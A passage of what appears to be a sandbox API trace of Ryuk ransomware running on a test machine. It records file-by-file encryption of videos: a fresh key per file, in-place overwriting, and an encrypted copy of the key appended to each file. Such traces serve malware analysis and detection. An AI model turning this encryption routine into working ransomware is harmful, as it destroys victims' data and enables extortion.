returned 0x0 [0158.976] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7e8, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x7e8, lpOverlapped=0x0) returned 1 [0158.976] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0158.976] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x7e8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x7f0) returned 1 [0158.976] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.976] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x7f0, lpOverlapped=0x0) returned 1 [0158.976] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0158.976] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0158.976] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0158.976] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0158.977] CloseHandle (hObject=0xe4) returned 1 [0159.017] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.022] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.022] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.023] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.023] SetLastError (dwErrCode=0x0) [0159.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.023] GetLastError () returned 0xb7 [0159.023] CloseHandle (hObject=0xe4) returned 1 [0159.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.023] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.023] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.023] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.023] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\1yqNVU-.avi", dwFileAttributes=0x80) returned 1 [0159.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\1yqNVU-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\1yqnvu-.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.024] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=56910) returned 1 [0159.024] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=56910) returned 1 [0159.024] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xdd2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.024] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.025] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.025] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.025] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.025] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.025] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xde4e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xde4e, lpOverlapped=0x0) returned 1 [0159.026] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.026] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xde4e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xde50) returned 1 [0159.027] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.027] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xde50, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xde50, lpOverlapped=0x0) returned 1 [0159.027] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.027] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.027] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.027] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.027] CloseHandle (hObject=0xd4) returned 1 [0159.050] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.054] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.054] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.054] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.054] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.054] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\BhrRzQtUjs.mkv", dwFileAttributes=0x80) returned 1 [0159.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\BhrRzQtUjs.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\bhrrzqtujs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.055] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=102004) returned 1 [0159.055] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=102004) returned 1 [0159.055] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x18d52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.055] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.056] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.056] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.056] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.056] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.056] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18e74, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18e74, lpOverlapped=0x0) returned 1 [0159.057] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.057] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e74, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e80) returned 1 [0159.058] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.058] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18e80, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x18e80, lpOverlapped=0x0) returned 1 [0159.058] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.058] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.058] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.058] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.058] CloseHandle (hObject=0xd4) returned 1 [0159.072] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.076] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.076] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.077] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.077] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.077] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\DPqtMqlSMmMciqwAZIi.mp4", dwFileAttributes=0x80) returned 1 [0159.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\DPqtMqlSMmMciqwAZIi.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\dpqtmqlsmmmciqwazii.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.077] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=25710) returned 1 [0159.077] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=25710) returned 1 [0159.077] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x634c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.077] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.078] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.078] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.078] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.078] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.078] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x646e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x646e, lpOverlapped=0x0) returned 1 [0159.079] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.079] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x646e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x6470) returned 1 [0159.079] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.079] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6470, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x6470, lpOverlapped=0x0) returned 1 [0159.079] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.079] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.079] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.079] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.080] CloseHandle (hObject=0xd4) returned 1 [0159.095] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.099] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.099] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.099] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.099] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.099] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\K9FhVrkaHtodSY vCz.swf", dwFileAttributes=0x80) returned 1 [0159.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\K9FhVrkaHtodSY vCz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\k9fhvrkahtodsy vcz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.099] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=34990) returned 1 [0159.099] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=34990) returned 1 [0159.100] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x878c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.100] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.100] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.100] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.100] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.100] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.100] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x88ae, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x88ae, lpOverlapped=0x0) returned 1 [0159.101] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.101] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x88ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x88b0) returned 1 [0159.101] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.101] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x88b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x88b0, lpOverlapped=0x0) returned 1 [0159.101] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.102] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.102] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.102] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.102] CloseHandle (hObject=0xd4) returned 1 [0159.117] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.121] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.121] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.122] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.122] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.122] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\VJAqg1cE596fuI-.flv", dwFileAttributes=0x80) returned 1 [0159.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\Q2 WKFS8V N4mGv8\\VJAqg1cE596fuI-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\q2 wkfs8v n4mgv8\\vjaqg1ce596fui-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.122] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=77523) returned 1 [0159.122] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=77523) returned 1 [0159.123] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x12db1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.123] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.123] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.123] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.123] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.124] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.124] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12ed3, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x12ed3, lpOverlapped=0x0) returned 1 [0159.125] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.125] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x12ed3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x12ee0) returned 1 [0159.125] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.125] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12ee0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x12ee0, lpOverlapped=0x0) returned 1 